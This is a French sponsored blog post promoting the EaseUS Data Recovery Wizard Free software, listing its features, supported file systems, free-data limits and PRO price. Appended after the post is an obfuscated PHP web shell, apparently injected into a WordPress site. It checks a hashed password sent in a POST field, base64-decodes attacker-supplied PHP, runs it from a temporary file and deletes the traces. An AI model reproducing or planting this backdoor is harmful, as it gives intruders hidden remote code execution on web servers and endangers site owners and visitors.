Présentation – Logiciel de récupération de données gratuit Windows

Présentation – Logiciel de récupération de données gratuit Windows Posted on septembre 11, 2019

Vous êtes confronté à une perte de données accidentelle ? Peut importe la cause, le logiciel de récupération de données gratuit EaseUS Data Recovery Wizard Free 12.9.1 peut vous aider à récupérer les données avec 97,3% de taux de succès.

Quelle que soit la cause de la perte, il est possible de récupérer les données perdues en 3 étapes seulement et gratuitement jusqu’à 2 Go.

EaseUS Data Recovery Wizard peut récupérer les données de votre disque dur, clé USB (récupérer des fichiers supprimés sur clé usb), carte mémoire et d’autres périphériques de stockage. Rapide et facile, accessible aux débutants, ne demande aucune compétence technique.

La récupération de données (fichiers, images, documents, vidéos, etc. plus de 1 000 formats sont pris en charge) perdues lors de la suppression, le formatage, la perte de partition, crash du système d’exploitation, attaque de malware / ransomware et autres cas de perte de données est possible techniquement pour peu d’agir rapidement juste après l’incident.

Cela vaut pour les PC, les ordinateurs portables, les disques durs, les SSD, les clé USB, les cartes mémoire, les appareils photo numérique, et autres.

Récupération de données en 3 étapes seulement :

  1. Aperçu des fichiers disponibles pour récupération
  2. Analyse rapide ou approfondie du support de stockage
  3. Récupération des données choisies

Logiciel compatible de Windows 10 à Windows XP.

Systèmes de fichiers pris en charge : FAT(FAT12,FAT16,FAT32), exFAT, NTFS, NTFS5, ext2/ext3, HFS+, ReFS.

Par défaut, vous pouvez récupérer 500 Mo de données gratuitement dans EaseUS Data Recovery Wizard Free. Besoin de restaurer plus de données? Veuillez partager EaseUS Data Recovery Wizard sur Facebook, Twitter ou Google+ pour obtenir 1,5 Go supplémentaires gratuitement. L’option de partage se trouve dans le coin supérieur droit de l’interface d’EaseUS Data Recover Wizard.

Pour récupérer des données de manière illimitée, vous devrez opter pour la version PRO à 66,69 €.

 

Note : article publi-rédactionnel.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}